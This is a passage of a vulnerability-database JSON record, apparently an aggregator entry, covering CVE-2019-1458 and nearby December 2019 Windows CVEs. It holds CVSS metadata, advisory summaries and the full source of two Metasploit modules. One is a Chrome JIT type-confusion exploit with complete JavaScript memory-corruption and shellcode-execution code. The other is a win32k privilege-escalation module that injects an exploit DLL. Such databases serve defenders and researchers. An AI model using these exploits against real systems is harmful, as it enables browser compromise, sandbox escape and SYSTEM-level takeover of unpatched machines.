vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1472"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1472", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1472", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-07-27T13:50:25", "description": "# CVE-2019-1458: Going from 'in the wild report' to POC\n\n## Intr...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-03T17:55:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2022-07-27T07:11:35", "id": "1896BBB2-2D7E-5A06-B7A9-42968CA73DE1", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:06", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-11T08:30:14", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2022-06-21T15:58:02", "id": "E63F927D-FD49-50BE-A186-E588888DE48E", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T15:29:18", "description": "# CVE-2019-1476\r\n\r\n## AppXSvc Arbitrary File Overwrite DoS\r\n\r\nI ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-05T21:00:16", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0841", "CVE-2019-1476"], "modified": "2022-02-27T04:27:38", "id": "C44E7954-53F4-592A-A1A3-8C6E6BEC599C", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "metasploit": [{"lastseen": "2023-06-13T15:56:22", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process. This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully. Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2022-02-16T11:48:55", "id": "MSF:EXPLOIT-MULTI-BROWSER-CHROME_OBJECT_CREATE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/chrome_object_create/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer::BrowserExploit\n include Msf::Payload::Windows::AddrLoader_x64\n include Msf::Payload::Windows::ReflectiveDllInject_x64\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process.\n This module can target the renderer process (target 0), but Google\n Chrome must be launched with the --no-sandbox flag for the payload to\n execute successfully.\n Alternatively, this module can use CVE-2019-1458 to escape the renderer\n sandbox (target 1). This will only work on vulnerable versions of\n Windows (e.g Windows 7) and the exploit can only be triggered once.\n Additionally the exploit can cause the target machine to restart\n when the session is terminated. A BSOD is also likely to occur when\n the system is shut down or rebooted.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx', 'linux'],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Stability' => [CRASH_SAFE]\n },\n 'Targets' => [\n [\n 'No sandbox escape (--no-sandbox)', {}\n ],\n [\n 'Windows 7 (x64) sandbox escape via CVE-2019-1458',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }\n }\n ],\n ],\n 'DisclosureDate' => '2018-09-25'\n )\n )\n deregister_options('DLL')\n end\n\n def library_path\n File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll')\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n download_payload = ''\n shellcode = payload.encoded\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? '/'\n\n if target.name.end_with?('CVE-2019-1458')\n if request.uri.to_s.end_with?('/payload')\n loader_data = stage_payload\n pidx = loader_data.index('PAYLOAD:')\n if pidx\n loader_data[pidx, payload.encoded.length] = payload.encoded\n end\n loader_data += \"\\0\" * (0x20000 - loader_data.length)\n send_response(cli, loader_data, {\n 'Content-Type' => 'application/octet-stream',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n print_good(\"Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)\")\n end\n loader = generate_loader\n shellcode = loader[0]\n shellcode_addr_offset = loader[1]\n shellcode_size_offset = loader[2]\n download_payload = <<-JS\n var req = new XMLHttpRequest();\n req.open('GET', '#{uripath}payload', false);\n req.overrideMimeType('text/plain; charset=x-user-defined');\n req.send(null);\n if (req.status != 200) {\n return;\n }\n let payload_size = req.responseText.length;\n let payload_array = new ArrayBuffer(payload_size);\n let payload8 = new Uint8Array(payload_array);\n for (let i = 0; i < req.responseText.length; i++) {\n payload8[i] = req.responseText.charCodeAt(i) & 0xff;\n }\n let payload_array_mem_addr = memory.addrof(payload_array) + 0x20n;\n let payload_array_addr = memory.readPtr(payload_array_mem_addr);\n print('payload addr: 0x' + payload_array_addr.toString(16));\n uint64View[0] = payload_array_addr;\n for (let i = 0; i < 8; i++) {\n shellcode[#{shellcode_addr_offset} + i] = uint8View[i];\n }\n for (let i = 0; i < 4; i++) {\n shellcode[#{shellcode_size_offset} + i] = (payload_size>>(8*i)) & 0xff;\n }\n for (let i = 4; i < 8; i++) {\n shellcode[#{shellcode_size_offset} + i] = 0;\n }\n JS\n end\n\n jscript = <<~JS\n let ab = new ArrayBuffer(8);\n let floatView = new Float64Array(ab);\n let uint64View = new BigUint64Array(ab);\n let uint8View = new Uint8Array(ab);\n\n let shellcode = new Uint8Array([#{Rex::Text.to_num(shellcode)}]);\n\n Number.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n };\n\n BigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n };\n\n function hex(n) {\n return '0x' + n.toString(16);\n };\n\n function fail(s) {\n print('FAIL ' + s);\n throw null;\n }\n\n const NUM_PROPERTIES = 32;\n const MAX_ITERATIONS = 100000;\n\n function gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n }\n\n function make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n }\n\n function pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n #{download_payload}\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(el_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n }\n\n pwn();\n JS\n\n jscript = add_debug_print_js(jscript)\n html = %(\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n)\n send_response(cli, html, {\n 'Content-Type' => 'text/html',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T21:11:04", "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitalized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-15T15:59:44", "type": "metasploit", "title": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2023-05-25T04:36:46", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2019_1458_WIZARDOPIUM-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2019_1458_wizardopium/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',\n 'Description' => %q{\n This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'piotrflorczyk', # poc\n 'unamer', # exploit\n 'timwr', # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [\n ['Windows 7 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'References' => [\n ['CVE', '2019-1458'],\n ['URL', 'https://github.com/unamer/CVE-2019-1458'],\n ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],\n ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],\n ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']\n ],\n 'DisclosureDate' => '2019-12-10',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'WizardOpium' ]\n )\n )\n end\n\n def check\n if session.platform != 'windows'\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe\n end\n\n file_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys')\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n build_num_gemversion = Rex::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\")\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/\n if (build_num_gemversion >= Rex::Version.new('6.0.6000.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.18427')) # Windows 10 v1507\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.99999')) # Windows 10 v1511\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.3383')) # Windows 10 v1607\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')\n end\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Triggering the exploit...')\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2019_1458_wizardopium.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:00", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2019-1458)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-04-27T00:00:00", "id": "CPAI-2019-1580", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:21:15", "description": "An information disclosure vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Information Disclosure (CVE-2019-1469)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1469"], "modified": "2019-12-10T00:00:00", "id": "CPAI-2019-1573", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:21:25", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft VBScript Remote Code Execution (CVE-2019-1485)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 